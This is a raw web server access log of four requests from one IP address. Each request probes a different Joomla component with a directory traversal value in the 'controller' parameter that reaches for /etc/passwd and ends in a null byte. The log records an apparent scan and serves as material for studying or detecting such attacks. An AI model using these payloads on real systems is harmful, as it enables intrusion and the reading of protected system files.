157.245.14.216 - - [26/Jan/2024:21:57:51 +0700] "GET /index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 318 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:51 +0700] "GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 314 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:53 +0700] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 320 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
157.245.14.216 - - [26/Jan/2024:21:57:53 +0700] "GET /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 303 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36"
